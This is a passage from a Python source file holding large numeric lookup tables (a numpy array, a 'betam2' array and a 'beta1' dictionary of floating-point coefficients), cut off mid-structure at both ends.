np.array([0.0,0.00025,0.0005,0.00075,0.001,0.0012000000000000001,0.0014,0.0015999999999999999,0.0018,0.002,0.0022,0.0024000000000000002,0.0026,0.0028,0.003,0.0032,0.0034000000000000002,0.0036,0.0038,0.004,0.0042,0.0044,0.0046,0.0048000000000000004,0.005,0.0052,0.0054,0.0056,0.0058000000000000005,0.006,0.0062,0.0064,0.0066,0.0068000000000000005,0.007,0.0072,0.0074,0.0076,0.0078000000000000005,0.008,0.0082,0.0084,0.0086,0.008799999999999999,0.009,0.00925,0.0095,0.00975,0.01,0.0102,0.0104,0.0106,0.010799999999999999,0.011,0.0112,0.0114,0.0116,0.0118,0.012,0.0122,0.0124,0.0126,0.012799999999999999,0.013,0.0132,0.0134,0.0136,0.0138,0.014,0.01425,0.014499999999999999,0.01475,0.015,0.0152,0.0154,0.0156,0.0158,0.016,0.0162,0.0164,0.0166,0.016800000000000002,0.017,0.01725,0.0175,0.01775,0.018,0.018199999999999997,0.0184,0.0186,0.0188,0.019,0.0192,0.0194,0.0196,0.0198,0.02,0.02025,0.0205,0.02075,0.021,0.0212,0.0214,0.0216,0.0218,0.022,0.02225,0.0225,0.02275,0.023,0.0232,0.0234,0.0236,0.0238,0.024,0.02425,0.0245,0.02475,0.025,0.0252,0.0254,0.0256,0.0258,0.026,0.02625,0.0265,0.02675,0.027,0.0272,0.0274,0.0276,0.027800000000000002,0.028,0.02825,0.0285,0.02875,0.029,0.0292,0.0294,0.0296,0.0298,0.03,0.03025,0.0305,0.03075,0.031,0.0312,0.0314,0.0316,0.0318,0.032,0.03225,0.0325,0.03275,0.033,0.03325,0.0335,0.03375,0.034,0.0342,0.0344,0.034600000000000006,0.034800000000000005,0.035,0.035250000000000004,0.035500000000000004,0.03575,0.036,0.03625,0.0365,0.03675,0.037,0.0372,0.037399999999999996,0.0376,0.0378,0.038,0.03825,0.0385,0.03875,0.039,0.03925,0.0395,0.03975,0.04,0.04025,0.0405,0.04075,0.041,0.04125,0.0415,0.04175,0.042,0.0422,0.0424,0.0426,0.0428,0.043,0.04325,0.0435,0.04375,0.044,0.04425,0.0445,0.04475,0.045,0.04525,0.0455,0.04575,0.046,0.04625,0.0465,0.04675,0.047,0.04725,0.0475,0.04775,0.048,0.0482,0.0484,0.048600000000000004,0.0488,0.049,0.04925,0.0495,0.04975,0.05,0.05025,0.0505,0.050749999999999997,0.051,0.05125,0.0515,0.05175,0.052,0.05225,0.0525,0.05275,0.053,0.05325,0.0535,0.05375,0.054,0.05425,0.0545,0.05475,0.055,0.05525,0.0555,0.05575,0.056,0.05625,0.0565,0.05675,0.057,0.05725,0.0575,0.05775,0.058,0.05825,0.058499999999999996,0.05875,0.059,0.05933333333333333,0.059666666666666666,0.06,0.06025,0.0605,0.06075,0.061,0.06125,0.0615,0.06175,0.062,0.06225,0.0625,0.06275,0.063,0.06325,0.0635,0.06375,0.064,0.06425,0.0645,0.06475,0.065,0.06525,0.0655,0.06575,0.066,0.06633333333333334,0.06666666666666667,0.067,0.06725,0.0675,0.06775,0.068,0.06825,0.0685,0.06875,0.069,0.06925,0.0695,0.06975,0.07,0.07033333333333333,0.07066666666666667,0.071,0.07125,0.0715,0.07175,0.072,0.07225,0.0725,0.07275,0.073,0.07325,0.0735,0.07375,0.074,0.07433333333333333,0.07466666666666666,0.075,0.07525,0.0755,0.07575,0.076,0.07633333333333334,0.07666666666666666,0.077,0.07725,0.0775,0.07775,0.078,0.07825,0.0785,0.07875,0.079,0.07933333333333334,0.07966666666666666,0.08,0.08025,0.0805,0.08075,0.081,0.08133333333333334,0.08166666666666667,0.082,0.08225,0.0825,0.08275,0.083,0.08333333333333334,0.08366666666666667,0.084,0.08425,0.0845,0.08475,0.085,0.08533333333333333,0.08566666666666667,0.086,0.08625,0.0865,0.08675,0.087,0.08733333333333333,0.08766666666666666,0.088,0.08825,0.0885,0.08875,0.089,0.08933333333333333,0.08966666666666666,0.09,0.09025,0.0905,0.09075,0.091,0.09133333333333334,0.09166666666666666,0.092,0.09225,0.0925,0.09275,0.093,0.09333333333333334,0.09366666666666666,0.094,0.09433333333333334,0.09466666666666666,0.095,0.09525,0.0955,0.09575,0.096,0.09633333333333334,0.09666666666666666,0.097,0.09733333333333334,0.09766666666666667,0.098,0.09825,0.0985,0.09875,0.099,0.09933333333333334,0.09966666666666667,0.1,0.10033333333333334,0.10066666666666667,0.101,0.10133333333333333,0.10166666666666667,0.102,0.10225,0.1025,0.10275,0.103,0.10333333333333333,0.10366666666666666,0.104,0.10433333333333333,0.10466666666666666,0.105,0.10533333333333333,0.10566666666666666,0.106,0.10633333333333334,0.10666666666666666,0.107,0.10725,0.1075,0.10775,0.108,0.10833333333333334,0.10866666666666666,0.109,0.10933333333333334,0.10966666666666666,0.11,0.11033333333333334,0.11066666666666666,0.111,0.11133333333333334,0.11166666666666666,0.112,0.11233333333333334,0.11266666666666666,0.113,0.11333333333333334,0.11366666666666667,0.114,0.11433333333333334,0.11466666666666667,0.115,0.11533333333333334,0.11566666666666667,0.116,0.11625,0.1165,0.11675,0.117,0.11733333333333333,0.11766666666666667,0.118,0.11833333333333333,0.11866666666666666,0.119,0.11933333333333333,0.11966666666666666,0.12,0.12033333333333333,0.12066666666666666,0.121,0.12133333333333333,0.12166666666666666,0.122,0.12233333333333334,0.12266666666666666,0.123,0.1235,0.124,0.12433333333333334,0.12466666666666666,0.125,0.12533333333333332,0.12566666666666668,0.126,0.12633333333333333,0.12666666666666668,0.127,0.12733333333333333,0.12766666666666668,0.128,0.12833333333333333,0.12866666666666668,0.129,0.12933333333333333,0.12966666666666668,0.13,0.13033333333333333,0.13066666666666668,0.131,0.13133333333333333,0.13166666666666668,0.132,0.1325,0.133,0.13333333333333333,0.13366666666666668,0.134,0.13433333333333333,0.13466666666666668,0.135,0.13533333333333333,0.13566666666666669,0.136,0.13633333333333333,0.1366666666666667,0.137,0.1375,0.138,0.13833333333333334,0.1386666666666667,0.139,0.13933333333333334,0.1396666666666667,0.14,0.14033333333333334,0.14066666666666666,0.141,0.1415,0.142,0.1423333333333333,0.14266666666666666,0.143,0.1433333333333333,0.14366666666666666,0.144,0.1445,0.145,0.14533333333333331,0.14566666666666667,0.146,0.14633333333333332,0.14666666666666667,0.147,0.1475,0.148,0.14833333333333332,0.14866666666666667,0.149,0.14933333333333332,0.14966666666666667,0.15,0.1505,0.151,0.15133333333333332,0.15166666666666667,0.152,0.1525,0.153,0.15333333333333332,0.15366666666666667,0.154,0.1545,0.155,0.15533333333333332,0.15566666666666668,0.156,0.15633333333333332,0.15666666666666668,0.157,0.1575,0.158,0.15833333333333333,0.15866666666666668,0.159,0.1595,0.16,0.16033333333333333,0.16066666666666668,0.161,0.1615,0.162,0.16233333333333333,0.16266666666666668,0.163,0.1635,0.164,0.1645,0.165,0.16533333333333333,0.16566666666666668,0.166,0.1665,0.167,0.16733333333333333,0.16766666666666669,0.168,0.1685,0.169,0.1695,0.17,0.17033333333333334,0.1706666666666667,0.171,0.17149999999999999,0.172,0.1725,0.173,0.1733333333333333,0.17366666666666666,0.174,0.1745,0.175,0.1755,0.176,0.17633333333333331,0.17666666666666667,0.177,0.1775,0.178,0.1785,0.179,0.17933333333333332,0.17966666666666667,0.18,0.1805,0.181,0.1815,0.182,0.1825,0.183,0.18333333333333332,0.18366666666666667,0.184,0.1845,0.185,0.1855,0.186,0.1865,0.187,0.1875,0.188,0.1885,0.189,0.18933333333333333,0.18966666666666668,0.19,0.1905,0.191,0.1915,0.192,0.1925,0.193,0.1935,0.194,0.1945,0.195,0.1955,0.196,0.1965,0.197,0.1975,0.198,0.19833333333333333,0.19866666666666669,0.199,0.1995,0.2,0.2005,0.201,0.2015,0.202,0.2025,0.203,0.20350000000000001,0.204,0.2045,0.205,0.2055,0.206,0.2065,0.207,0.2075,0.208,0.2085,0.209,0.2095,0.21,0.2105,0.211,0.212,0.2125,0.213,0.2135,0.214,0.2145,0.215,0.2155,0.216,0.2165,0.217,0.2175,0.218,0.2185,0.219,0.2195,0.22,0.221,0.2215,0.222,0.2225,0.223,0.2235,0.224,0.2245,0.225,0.2255,0.226,0.227,0.2275,0.228,0.2285,0.229,0.2295,0.23,0.231,0.2315,0.232,0.2325,0.233,0.2335,0.234,0.235,0.2355,0.236,0.2365,0.237,0.238,0.2385,0.239,0.2395,0.24,0.241,0.2415,0.242,0.2425,0.243,0.244,0.2445,0.245,0.2455,0.246,0.247,0.2475,0.248,0.249,0.2495,0.25,0.2505,0.251,0.252,0.2525,0.253,0.254,0.2545,0.255,0.256,0.2565,0.257,0.258,0.2585,0.259,0.26,0.2605,0.261,0.262,0.2625,0.263,0.264,0.2645,0.265,0.266,0.2665,0.267,0.268,0.2685,0.269,0.27,0.271,0.2715,0.272,0.273,0.2735,0.274,0.275,0.276,0.2765,0.277,0.278,0.279,0.2795,0.28,0.281,0.282,0.2825,0.283,0.284,0.285,0.2855,0.286,0.287,0.288,0.2885,0.289,0.29,0.291,0.292,0.2925,0.293,0.294,0.295,0.296,0.2965,0.297,0.298,0.299,0.3,0.301,0.3015,0.302,0.303,0.304,0.305,0.306,0.307,0.3075,0.308,0.309,0.31,0.311,0.312,0.313,0.314,0.3145,0.315,0.316,0.317,0.318,0.319,0.32,0.321,0.322,0.323,0.324,0.325,0.326,0.327,0.328,0.329,0.33,0.331,0.332,0.333,0.334,0.335,0.336,0.337,0.338,0.339,0.34,0.341,0.342,0.343,0.344,0.345,0.346,0.347,0.349,0.35,0.351,0.352,0.353,0.354,0.355,0.357,0.358,0.359,0.36,0.361,0.363,0.364,0.365,0.366,0.367,0.369,0.37,0.371,0.373,0.374,0.375,0.376,0.378,0.379,0.381,0.382,0.383,0.385,0.386,0.387,0.389,0.39,0.392,0.393,0.395,0.396,0.398,0.399,0.401,0.402,0.404,0.406,0.407,0.409,0.411,0.412,0.414,0.416,0.417,0.419,0.421,0.423,0.424,0.426,0.428,0.43,0.432,0.434,0.436,0.438,0.44,0.442,0.444,0.446,0.448,0.45,0.453,0.455,0.457,0.46,0.462,0.464,0.467,0.469,0.472,0.474,0.477,0.48,0.483,0.485,0.488,0.491,0.494,0.497,0.501,0.504,0.507,0.511,0.514,0.518,0.522,0.525,0.529,0.534,0.538,0.542,0.547,0.552,0.557,0.562,0.568,0.574,0.58,0.587,0.594,0.602,0.61,0.619,0.629,0.64,0.653,0.668,0.687,0.711,0.749,0.999]), # skipcq: FLK-E231, FLK-E501 'betam2': np.array([0.251,0.288,0.313,0.331,0.346,0.359,0.371,0.381,0.39,0.398,0.406,0.413,0.419,0.426,0.432,0.437,0.442,0.448,0.452,0.457,0.462,0.466,0.47,0.474,0.478,0.482,0.485,0.489,0.492,0.496,0.499,0.502,0.505,0.508,0.511,0.514,0.517,0.52,0.522,0.525,0.528,0.53,0.533,0.535,0.538,0.54,0.542,0.545,0.547,0.549,0.551,0.553,0.555,0.558,0.56,0.562,0.564,0.566,0.567,0.569,0.571,0.573,0.575,0.577,0.579,0.58,0.582,0.584,0.586,0.587,0.589,0.591,0.592,0.594,0.595,0.597,0.599,0.6,0.602,0.603,0.605,0.606,0.608,0.609,0.61,0.612,0.613,0.615,0.616,0.617,0.619,0.62,0.622,0.623,0.624,0.626,0.627,0.628,0.629,0.631,0.632,0.633,0.634,0.636,0.637,0.638,0.639,0.64,0.642,0.643,0.644,0.645,0.646,0.647,0.649,0.65,0.651,0.652,0.653,0.654,0.655,0.656,0.657,0.658,0.659,0.66,0.662,0.663,0.664,0.665,0.666,0.667,0.668,0.669,0.67,0.671,0.672,0.673,0.674,0.675,0.676,0.6765000000000001,0.677,0.678,0.679,0.68,0.681,0.682,0.683,0.684,0.685,0.686,0.687,0.688,0.6884999999999999,0.689,0.69,0.691,0.692,0.693,0.694,0.695,0.6955,0.696,0.697,0.698,0.699,0.7,0.7004999999999999,0.701,0.702,0.703,0.704,0.705,0.7055,0.706,0.707,0.708,0.709,0.7095,0.71,0.711,0.712,0.7124999999999999,0.713,0.714,0.715,0.716,0.7164999999999999,0.717,0.718,0.719,0.7195,0.72,0.721,0.7215,0.722,0.723,0.724,0.7244999999999999,0.725,0.726,0.727,0.7275,0.728,0.729,0.7295,0.73,0.731,0.732,0.7324999999999999,0.733,0.734,0.7344999999999999,0.735,0.736,0.7364999999999999,0.737,0.738,0.7384999999999999,0.739,0.74,0.7404999999999999,0.741,0.742,0.7424999999999999,0.743,0.744,0.7444999999999999,0.745,0.746,0.7464999999999999,0.747,0.748,0.7484999999999999,0.749,0.7495,0.75,0.751,0.7515000000000001,0.752,0.753,0.7535000000000001,0.754,0.7545,0.755,0.756,0.7565,0.757,0.7575000000000001,0.758,0.759,0.7595000000000001,0.76,0.7605,0.761,0.762,0.7625,0.763,0.7635000000000001,0.764,0.765,0.7655000000000001,0.766,0.7665,0.767,0.768,0.7685,0.769,0.7695000000000001,0.77,0.7705,0.771,0.7715000000000001,0.772,0.773,0.7735000000000001,0.774,0.7745,0.775,0.7755000000000001,0.776,0.7765,0.777,0.778,0.7785,0.779,0.7795000000000001,0.78,0.7805,0.781,0.7815000000000001,0.782,0.7825,0.783,0.784,0.7845,0.785,0.7855000000000001,0.786,0.7865,0.787,0.7875000000000001,0.788,0.7885,0.789,0.7895000000000001,0.79,0.7905,0.791,0.7915000000000001,0.792,0.7925,0.793,0.7935000000000001,0.794,0.7945,0.795,0.7955000000000001,0.796,0.7965,0.797,0.7975000000000001,0.798,0.7985,0.799,0.7995000000000001,0.8,0.8005,0.801,0.8015000000000001,0.802,0.8025,0.803,0.8035000000000001,0.804,0.8045,0.805,0.8055000000000001,0.806,0.8063333333333333,0.8066666666666668,0.807,0.8075000000000001,0.808,0.8085,0.809,0.8095000000000001,0.81,0.8105,0.811,0.8115000000000001,0.812,0.8125,0.813,0.8133333333333332,0.8136666666666666,0.814,0.8145,0.815,0.8154999999999999,0.816,0.8165,0.817,0.8173333333333332,0.8176666666666667,0.818,0.8185,0.819,0.8194999999999999,0.82,0.8205,0.821,0.8213333333333332,0.8216666666666667,0.822,0.8225,0.823,0.8234999999999999,0.824,0.8245,0.825,0.8253333333333333,0.8256666666666667,0.826,0.8265,0.827,0.8274999999999999,0.828,0.8283333333333333,0.8286666666666667,0.829,0.8294999999999999,0.83,0.8303333333333333,0.8306666666666667,0.831,0.8314999999999999,0.832,0.8325,0.833,0.8333333333333333,0.8336666666666667,0.834,0.8345,0.835,0.8353333333333333,0.8356666666666667,0.836,0.8365,0.837,0.8373333333333333,0.8376666666666667,0.838,0.8385,0.839,0.8393333333333333,0.8396666666666667,0.84,0.8405,0.841,0.8413333333333333,0.8416666666666667,0.842,0.8425,0.843,0.8433333333333333,0.8436666666666667,0.844,0.8445,0.845,0.8453333333333333,0.8456666666666667,0.846,0.8465,0.847,0.8473333333333333,0.8476666666666667,0.848,0.8485,0.849,0.8493333333333333,0.8496666666666667,0.85,0.8503333333333333,0.8506666666666667,0.851,0.8514999999999999,0.852,0.8523333333333333,0.8526666666666667,0.853,0.8533333333333333,0.8536666666666667,0.854,0.8545,0.855,0.8553333333333333,0.8556666666666667,0.856,0.8563333333333333,0.8566666666666667,0.857,0.8574999999999999,0.858,0.8583333333333333,0.8586666666666667,0.859,0.8593333333333333,0.8596666666666667,0.86,0.8605,0.861,0.8613333333333333,0.8616666666666667,0.862,0.8623333333333333,0.8626666666666667,0.863,0.8633333333333333,0.8636666666666667,0.864,0.8643333333333333,0.8646666666666667,0.865,0.8654999999999999,0.866,0.8663333333333333,0.8666666666666667,0.867,0.8673333333333333,0.8676666666666667,0.868,0.8683333333333333,0.8686666666666667,0.869,0.8693333333333333,0.8696666666666667,0.87,0.8703333333333333,0.8706666666666667,0.871,0.8714999999999999,0.872,0.8723333333333333,0.8726666666666667,0.873,0.8733333333333333,0.8736666666666667,0.874,0.8743333333333333,0.8746666666666667,0.875,0.8753333333333333,0.8756666666666667,0.876,0.8763333333333333,0.8766666666666667,0.877,0.8773333333333333,0.8776666666666667,0.878,0.8783333333333333,0.8786666666666667,0.879,0.8793333333333333,0.8796666666666667,0.88,0.8803333333333333,0.8806666666666667,0.881,0.8813333333333333,0.8816666666666667,0.882,0.8823333333333333,0.8826666666666667,0.883,0.8833333333333333,0.8836666666666667,0.884,0.8843333333333333,0.8846666666666667,0.885,0.8853333333333333,0.8856666666666667,0.886,0.8863333333333333,0.8866666666666667,0.887,0.8873333333333333,0.8876666666666667,0.888,0.88825,0.8885000000000001,0.88875,0.889,0.8893333333333333,0.8896666666666667,0.89,0.8903333333333333,0.8906666666666667,0.891,0.8913333333333333,0.8916666666666667,0.892,0.8923333333333333,0.8926666666666667,0.893,0.8933333333333333,0.8936666666666667,0.894,0.89425,0.8945000000000001,0.89475,0.895,0.8953333333333333,0.8956666666666667,0.896,0.8963333333333333,0.8966666666666667,0.897,0.8973333333333333,0.8976666666666667,0.898,0.89825,0.8985000000000001,0.89875,0.899,0.8993333333333333,0.8996666666666667,0.9,0.9003333333333333,0.9006666666666667,0.901,0.9013333333333333,0.9016666666666667,0.902,0.90225,0.9025000000000001,0.90275,0.903,0.9033333333333333,0.9036666666666667,0.904,0.9043333333333333,0.9046666666666667,0.905,0.90525,0.9055,0.90575,0.906,0.9063333333333333,0.9066666666666667,0.907,0.90725,0.9075,0.9077500000000001,0.908,0.9083333333333333,0.9086666666666667,0.909,0.9093333333333333,0.9096666666666667,0.91,0.91025,0.9105000000000001,0.9107500000000001,0.911,0.9113333333333333,0.9116666666666667,0.912,0.91225,0.9125000000000001,0.9127500000000001,0.913,0.9133333333333333,0.9136666666666667,0.914,0.91425,0.9145000000000001,0.9147500000000001,0.915,0.9153333333333333,0.9156666666666667,0.916,0.91625,0.9165000000000001,0.9167500000000001,0.917,0.9173333333333333,0.9176666666666667,0.918,0.91825,0.9185000000000001,0.9187500000000001,0.919,0.9193333333333333,0.9196666666666667,0.92,0.92025,0.9205000000000001,0.9207500000000001,0.921,0.92125,0.9215,0.9217500000000001,0.922,0.9223333333333333,0.9226666666666667,0.923,0.92325,0.9235,0.9237500000000001,0.924,0.92425,0.9245000000000001,0.9247500000000001,0.925,0.9253333333333333,0.9256666666666667,0.926,0.92625,0.9265000000000001,0.9267500000000001,0.927,0.92725,0.9275,0.9277500000000001,0.928,0.9283333333333333,0.9286666666666668,0.929,0.92925,0.9295,0.9297500000000001,0.93,0.93025,0.9305000000000001,0.9307500000000001,0.931,0.93125,0.9315,0.9317500000000001,0.932,0.9323333333333333,0.9326666666666668,0.933,0.93325,0.9335,0.9337500000000001,0.934,0.93425,0.9345000000000001,0.9347500000000001,0.935,0.93525,0.9355,0.9357500000000001,0.936,0.93625,0.9365000000000001,0.9367500000000001,0.937,0.93725,0.9375,0.93775,0.938,0.9383333333333332,0.9386666666666666,0.939,0.9392499999999999,0.9395,0.93975,0.94,0.9402499999999999,0.9404999999999999,0.94075,0.941,0.9412499999999999,0.9415,0.94175,0.942,0.9422499999999999,0.9424999999999999,0.94275,0.943,0.9432499999999999,0.9435,0.94375,0.944,0.9442499999999999,0.9444999999999999,0.94475,0.945,0.9452499999999999,0.9455,0.94575,0.946,0.9462499999999999,0.9464999999999999,0.94675,0.947,0.9472499999999999,0.9475,0.94775,0.948,0.9482499999999999,0.9484999999999999,0.94875,0.949,0.9492499999999999,0.9495,0.94975,0.95,0.9502499999999999,0.9504999999999999,0.95075,0.951,0.9512499999999999,0.9515,0.95175,0.952,0.9522499999999999,0.9524999999999999,0.95275,0.953,0.9531999999999999,0.9533999999999999,0.9536,0.9538,0.954,0.9542499999999999,0.9544999999999999,0.95475,0.955,0.9552499999999999,0.9555,0.95575,0.956,0.9562499999999999,0.9564999999999999,0.95675,0.957,0.9572499999999999,0.9575,0.95775,0.958,0.9581999999999999,0.9583999999999999,0.9586,0.9588,0.959,0.9592499999999999,0.9595,0.95975,0.96,0.9602499999999999,0.9604999999999999,0.96075,0.961,0.9612499999999999,0.9615,0.96175,0.962,0.9621999999999999,0.9623999999999999,0.9626,0.9628,0.963,0.9632499999999999,0.9635,0.96375,0.964,0.9642499999999999,0.9644999999999999,0.96475,0.965,0.9652,0.9653999999999999,0.9656,0.9658,0.966,0.9662499999999999,0.9664999999999999,0.96675,0.967,0.9672499999999999,0.9675,0.96775,0.968,0.9682,0.9683999999999999,0.9686,0.9688,0.969,0.96925,0.9695,0.96975,0.97,0.9702,0.9703999999999999,0.9706,0.9708,0.971,0.97125,0.9715,0.97175,0.972,0.9722,0.9723999999999999,0.9726,0.9728,0.973,0.97325,0.9735,0.97375,0.974,0.9742,0.9743999999999999,0.9746,0.9748,0.975,0.97525,0.9755,0.97575,0.976,0.9762,0.9763999999999999,0.9766,0.9768,0.977,0.97725,0.9775,0.97775,0.978,0.9782,0.9783999999999999,0.9786,0.9788,0.979,0.97925,0.9795,0.97975,0.98,0.9802,0.9803999999999999,0.9806,0.9808,0.981,0.9812,0.9813999999999999,0.9816,0.9818,0.982,0.98225,0.9824999999999999,0.98275,0.983,0.9832,0.9833999999999999,0.9836,0.9838,0.984,0.9842,0.9843999999999999,0.9846,0.9848,0.985,0.98525,0.9855,0.98575,0.986,0.9862,0.9863999999999999,0.9866,0.9868,0.987,0.9872,0.9873999999999999,0.9876,0.9878,0.988,0.9882,0.9884,0.9886,0.9888,0.989,0.98925,0.9895,0.98975,0.99,0.9902,0.9904,0.9906,0.9908,0.991,0.9912,0.9914,0.9916,0.9918,0.992,0.9922,0.9924,0.9926,0.9928,0.993,0.9932,0.9934,0.9936,0.9938,0.994,0.9942,0.9944,0.9946,0.9948,0.995,0.9952,0.9954,0.9956,0.9958,0.996,0.9962,0.9964,0.9966,0.9968,0.997,0.9972,0.9974,0.9976,0.9978,0.998,0.9982,0.9984,0.9986,0.9988,0.999,0.999,0.999,0.999,0.999]), # skipcq: FLK-E231, FLK-E501 'beta1': {0.001: 0.00000319442756483, 0.002: 0.000011317463697, 0.003: 0.00002437224702, 0.004: 0.0000423586850569, 0.005: 0.0000652765986715, 0.006: 0.000093125769818, 0.007: 0.00012590591620148937, 0.008: 0.000163616721998012, 0.009: 0.0002062578100772347, 0.01: 0.0002538287583069279, 0.011: 0.000306329099853549, 0.012: 0.0003637583165964183, 0.013: 0.00042611584087932117, 0.014: 0.0004934010586615567, 0.015: 0.0005656133072855606, 0.016: 0.0006427518732867943, 0.017: 0.0007248159948162249, 0.018: 0.0008118048635664835, 0.019: 0.000903717621891434, 0.02: 0.001000553362565144, 0.021: 0.0011023111298422304, 0.022: 0.0012089899209829437, 0.023: 0.0013205886834092976, 0.024: 0.0014371063162054868, 0.025: 0.0015585416705288157, 0.026: 0.0016848935476064277, 0.027: 0.0018161607022541798, 0.028: 0.0019523418388866748, 0.029: 0.0020934356144756165, 0.03: 0.0022394406373552373, 0.031: 0.0023903554673226357, 0.032: 0.002546178615709405, 0.033: 0.0027069085455906938, 0.034: 0.002872543671793369, 0.035: 0.003043082360056609, 0.036: 0.0032185229285702534, 0.037: 0.0033988636467273906, 0.038: 0.003584102735485491, 0.039: 0.0037742383681569234, 0.04: 0.0039692686688357764, 0.041: 0.004169191713873449, 0.042: 0.004374005531412682, 0.043: 0.004583708101164634, 0.044: 0.004798297354602275, 0.045: 0.0050177711752145615, 0.046: 0.005242127397945962, 0.047: 0.005471363809906498, 0.048: 0.005705478149896408, 0.049: 0.005944468108748165, 0.05: 0.006188331329046212, 0.051: 0.006437065405400269, 0.052: 0.006690667884335984, 0.053: 0.006949136264386165, 0.054: 0.007212467996054513, 0.055: 0.0074806604819125325, 0.056: 0.007753711076500667, 0.057: 0.008031617086616195, 0.058: 0.008314375770990291, 0.059: 0.008601984340523077, 0.06: 0.00889443995837608, 0.061: 0.009191739739750827, 0.062: 0.009493880752152703, 0.063: 0.009800860015391079, 0.064: 0.010112674501407464, 0.065: 0.010429321134569111, 0.066: 0.010750796791506579, 0.067: 0.011077098301304688, 0.068: 0.011408222445400728, 0.069: 0.011744165957592563, 0.07: 0.012084925524209297, 0.071: 0.012430497784060565, 0.072: 0.012780879328580696, 0.073: 0.01313606670159937, 0.074: 0.01349605639963192, 0.075: 0.013860844871816616, 0.076: 0.014230428519951752, 0.077: 0.014604803698527647, 0.078: 0.014983966714864808, 0.079: 0.015367913828869609, 0.08: 0.015756641253450998, 0.081: 0.016150145154226952, 0.082: 0.0165484216497625, 0.083: 0.01695146681157209, 0.084: 0.01735927666406806, 0.085: 0.017771847184727605, 0.086: 0.018189174304006774, 0.087: 0.0186112539055101, 0.088: 0.019038081825895253, 0.089: 0.0194696538550656, 0.09: 0.01990596573604259, 0.091: 0.02034701316514059, 0.092: 0.020792791791978432, 0.093: 0.0212432972194774, 0.094: 0.021698525003969734, 0.095: 0.022158470655141968, 0.096: 0.02262312963619951, 0.097: 0.023092497363824387, 0.098: 0.02356656920832857, 0.099: 0.024045340493509006, 0.1: 0.024528806496860827, 0.101: 0.02501696244963071, 0.102: 0.025509803536677367, 0.103: 0.02600732489678805, 0.104: 0.02650952162246471, 0.105: 0.027016388760153814, 0.106: 0.02752792131023947, 0.107: 0.028044114227047643, 0.108: 0.028564962418981356, 0.109: 0.02909046074847784, 0.11: 0.02962060403212325, 0.111: 0.030155387040732673, 0.112: 0.030694804499282566, 0.113: 0.031238851087102927, 0.114: 0.03178752143778703, 0.115: 0.03234081013938614, 0.116: 0.03289871173438084, 0.117: 0.03346122071974054, 0.118: 0.034028331546989775, 0.119: 0.034600038622262325, 0.12: 0.03517633630635684, 0.121: 0.03575721891478989, 0.122: 0.03634268071786485, 0.123: 0.03693271594069995, 0.124: 0.037527318763313854, 0.125: 0.038126483320662014, 0.126: 0.03873020370270661, 0.127: 0.03933847395449336, 0.128: 0.039951288076140665, 0.129: 0.04056864002300359, 0.13: 0.041190523705625356, 0.131: 0.041816932989891205, 0.132: 0.04244786169702028, 0.133: 0.04308330360365301, 0.134: 0.04372325244195518, 0.135: 0.0443677018995566, 0.136: 0.04501664561978973, 0.137: 0.04567007720156599, 0.138: 0.04632799019958714, 0.139: 0.046990378124343715, 0.14: 0.04765723444216695, 0.141: 0.0483285525753247, 0.142: 0.049004325902069476, 0.143: 0.049684547756723464, 0.144: 0.05036921142970255, 0.145: 0.051058310167641355, 0.146: 0.05175183717341257, 0.147: 0.052449785606189916, 0.148: 0.05315214858157764, 0.149: 0.05385891917159001, 0.15: 0.054570090404798384, 0.151: 0.05528565526636637, 0.152: 0.05600560669808361, 0.153: 0.056729937598526965, 0.154: 0.05745864082302535, 0.155: 0.05819170918379992, 0.156: 0.05892913545003413, 0.157: 0.05967091234788417, 0.158: 0.060417032560635756, 0.159: 0.06116748872869495, 0.16: 0.06192227344973335, 0.161: 0.06268137927869694, 0.162: 0.06344479872792343, 0.163: 0.06421252426721585, 0.164: 0.06498454832387214, 0.165: 0.06576086328280793, 0.166: 0.06654146148661619, 0.167: 0.06732633523563517, 0.168: 0.06811547678803058, 0.169: 0.0689088783598769, 0.17: 0.06970653212522365, 0.171: 0.07050843021617553, 0.172: 0.07131456472297787, 0.173: 0.07212492769408313, 0.174: 0.07293951113623787, 0.175: 0.07375830701456244, 0.176: 0.07458130725262246, 0.177: 0.07540850373251008, 0.178: 0.0762398882949351, 0.179: 0.07707545273928854, 0.18: 0.07791518882372675, 0.181: 0.07875908826527792, 0.182: 0.07960714273989093, 0.183: 0.08045934388252407, 0.184: 0.08131568328724223, 0.185: 0.08217615250729793, 0.186: 0.0830407430551911, 0.187: 0.08390944640278333, 0.188: 0.0847822539813623, 0.189: 0.08565915718173367, 0.19: 0.08654014735430549, 0.191: 0.08742521580917012, 0.192: 0.08831435381620054, 0.193: 0.08920755260511812, 0.194: 0.09010480336558876, 0.195: 0.0910060972473264, 0.196: 0.09191142536015391, 0.197: 0.09282077877409256, 0.198: 0.09373414851947465, 0.199: 0.09465152558700353, 0.2: 0.09557290092786028, 0.201: 0.09649826545380326, 0.202: 0.09742761003720588, 0.203: 0.09836092551122107, 0.204: 0.09929820266980503, 0.205: 0.10023943226786301, 0.206: 0.10118460502128393, 0.207: 0.10213371160709263, 0.208: 0.10308674266349475, 0.209: 0.10404368878997927, 0.21: 0.10500454054743683, 0.211: 0.10596928845821446, 0.212: 0.10693792300624841, 0.213: 0.10791043463711919, 0.214: 0.10888681375817334, 0.215: 0.10986705073861491, 0.216: 0.11085113590957893, 0.217: 0.11183905956425746, 0.218: 0.11283081195797032, 0.219: 0.11382638330828407, 0.22: 0.11482576379508422, 0.221: 0.11582894356068629, 0.222: 0.11683591270992946, 0.223: 0.11784666131028751, 0.224: 0.1188611793919315, 0.225: 0.11987945694787307, 0.226: 0.12090148393402742, 0.227: 0.12192725026933787, 0.228: 0.12295674583585153, 0.229: 0.12398996047883411, 0.23: 0.125026884006872, 0.231: 0.12606750619196658, 0.232: 0.12711181676963323, 0.233: 0.12815980543900615, 0.234: 0.12921146186294907, 0.235: 0.1302667756681294, 0.236: 0.13132573644515383, 0.237: 0.13238833374864933, 0.238: 0.13345455709737608, 0.239: 0.13452439597432544, 0.24: 0.1355978398268364, 0.241: 0.13667487806666417, 0.242: 0.13775550007013634, 0.243: 0.1388396951782204, 0.244: 0.13992745269663925, 0.245: 0.1410187618959683, 0.246: 0.14211361201176276, 0.247: 0.14321199224465206, 0.248: 0.14431389176043544, 0.249: 0.14541929969020284, 0.25: 0.1465282051304419, 0.251: 0.14764059714313438, 0.252: 0.14875646475587598, 0.253: 0.14987579696197337, 0.254: 0.15099858272057623, 0.255: 0.15212481095674632, 0.256: 0.15325447056160868, 0.257: 0.1543875503924239, 0.258: 0.1555240392727349, 0.259: 0.1566639259924429, 0.26: 0.15780719930794154, 0.261: 0.15895384794222778, 0.262: 0.1601038605849814, 0.263: 0.1612572258927219, 0.264: 0.162413932488892, 0.265: 0.16357396896397502, 0.266: 0.16473732387561, 